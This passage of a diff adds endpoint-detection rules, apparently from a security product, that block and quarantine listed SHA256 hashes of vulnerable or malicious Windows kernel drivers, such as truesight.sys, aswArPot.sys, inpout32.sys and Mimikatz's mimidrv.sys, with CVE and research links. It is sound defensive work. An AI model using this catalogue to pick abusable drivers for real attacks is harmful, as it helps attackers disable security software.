+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475347Z",
+ "creation_date": "2026-03-23T11:45:31.475351Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475361Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "74d3c4c96a2598c883561d5caabaddd71a81d6bd65760b32c93c5161bd28d596",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "406087ff-389a-5e47-a975-1c2eafd2a5be",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152035Z",
+ "creation_date": "2026-03-23T11:45:31.152038Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152046Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "791e46f7a9464c34c95fa0f7d468b8b0b8ef5a60b766c445d78dedad2300396b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4061ead4-94a3-565a-aa93-2a7d90b688cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.497651Z",
+ "creation_date": "2026-03-23T11:45:31.497654Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.497660Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7e5a1c86133049837c7a0a4e334a2e3f24f8580a4b7d1a2776a6258727f5a493",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4063d9d1-6024-5156-94a2-084e78a4fc64",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984529Z",
+ "creation_date": "2026-03-23T11:45:29.984531Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984536Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e288439705d9be2c1f74cf8a44c3853ac3708e52c592b23398877006fadf6ccc",
+ "comment": "Vulnerable Kernel Driver (aka inpout32.sys) [https://www.loldrivers.io/drivers/97fa88f6-3819-4d56-a82c-52a492a9e2b5/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "406446c7-43c2-5a3a-b5da-8b18ed0e4fda",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969682Z",
+ "creation_date": "2026-03-23T11:45:29.969684Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969689Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c1b31926afb22ef6f8a3486f101da279d47c09d4acdb3a7bc743a7df8ae727bb",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4069e4e0-850f-5a57-981b-a3b89bb587e0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146277Z",
+ "creation_date": "2026-03-23T11:45:31.146279Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146284Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e26284a5fb856e2dd08d4d170348f57bb583ec9201ad225115feed1220cb39e1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "406af8cb-e469-5353-9e17-eccec3a52c2f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481133Z",
+ "creation_date": "2026-03-23T11:45:30.481135Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481140Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9ff4ef4bc143cb8df2ae2f800d5124b117456b2e04d4c33db766b7e8e21ea048",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "40735f29-624e-5df2-b2d6-19c27f3ec6d5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824646Z",
+ "creation_date": "2026-03-23T11:45:31.824648Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824654Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1ccbc6ab55d49b3f095fb3225e21df9c7752a9dd31febb13bde051c74b2d2b8b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "407aef52-6273-5ec0-8312-a9d2ae2eeffe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817060Z",
+ "creation_date": "2026-03-23T11:45:31.817062Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817067Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c1bdca534d8c83ecc2ae0f5db03d69c9687d8822662bd79c1d4640977dde2d75",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "407c1343-a14c-5554-a927-930e545dbcb1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494409Z",
+ "creation_date": "2026-03-23T11:45:31.494412Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494421Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6a60639f3f5e821c5c2eeef8a7bcbfc3fa5dc4b96641aaa081a1ea613155f71b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "40891794-b185-56da-aeb1-2e1a65ff5fe5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485801Z",
+ "creation_date": "2026-03-23T11:45:31.485805Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485815Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5b1eb05d052ba7fa8eafbcb6d1a224203339f690fb8dd289f486aa579418fe2f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "408d6b34-a5d6-539d-9ef8-77a515f2199c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809341Z",
+ "creation_date": "2026-03-23T11:45:31.809344Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809351Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5b9ce9a3dca79650b59b056fa0805cb757e1acd9c320911ac5db701c99ab6290",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4090cd0b-8f9d-50d6-8bf4-7d732d25a89f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140511Z",
+ "creation_date": "2026-03-23T11:45:31.140513Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140518Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f06489a6a790e5b2165fee14c6b35c31f6450f102a8bf14db59bdae51f38f8d9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "40974e93-174e-52a2-9028-ec3f4387fd57",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466100Z",
+ "creation_date": "2026-03-23T11:45:30.466103Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466112Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f58e09651d48d2b1bcec7b9f7bb85a2d1a7b65f7a51db281fe0c4f058a48597",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "409fe022-4e7c-534c-b559-a818a1df5a54",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835025Z",
+ "creation_date": "2026-03-23T11:45:30.835029Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835038Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b3fc6e204a8983d7c9a967c3919d41b0b04745c38086ea94fc80f60d8b4520db",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "40a13e3b-770c-5f3f-bbe5-4ca59cf152c7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981241Z",
+ "creation_date": "2026-03-23T11:45:29.981244Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981250Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f2ed6c1906663016123559d9f3407bc67f64e0d235fa6f10810a3fa7bb322967",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "40b7d1e4-aa34-5bac-a41d-ecfd7318574f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977604Z",
+ "creation_date": "2026-03-23T11:45:29.977606Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977612Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a52a6fe55bd1c294d6f26b68839770d97850e9ccd5ecfd7f96b9dc4386e0ff08",
+ "comment": "Vulnerable Kernel Driver (aka CorsairLLAccess64.sys) [https://www.loldrivers.io/drivers/a9d9cbb7-b5f6-4e74-97a5-29993263280e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "40b99a0a-943e-5e3a-a20b-3c9729a77b47",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615152Z",
+ "creation_date": "2026-03-23T11:45:29.615154Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615159Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d33f19a12cd8e8649a56ce2a41e2b56d2ed80f203e5ededc4114c78ef773ffa8",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "40b9c474-0a2f-5e85-a3ff-027294c7ac97",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825211Z",
+ "creation_date": "2026-03-23T11:45:30.825214Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825222Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "82f20f52a3e0951ecd4684068ad79d0c0f0efb6810633cee7b195feff842c997",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "40c2ced3-6593-52ff-b103-7ff0d083fa52",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825237Z",
+ "creation_date": "2026-03-23T11:45:30.825240Z",
+ 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825248Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "07d4944c3487b593ae998a8e63fb5d126e65c070bf496618174100b4bc560c3c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "40ca5533-3d89-5817-98be-ab9c6f613de8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485515Z", + "creation_date": "2026-03-23T11:45:31.485519Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485529Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "69081c612cd0536f5c5396c1b570c3b5ae63aa2053d83c3c381437899018c8ef", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"40ca7117-6213-5a9a-8ce4-d165080ab765", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617896Z", + "creation_date": "2026-03-23T11:45:29.617898Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617903Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "159dcf37dc723d6db2bad46ed6a1b0e31d72390ec298a5413c7be318aef4a241", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "40da7d9a-89d3-54b6-b4a3-c07954902ed1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613888Z", + "creation_date": "2026-03-23T11:45:29.613890Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
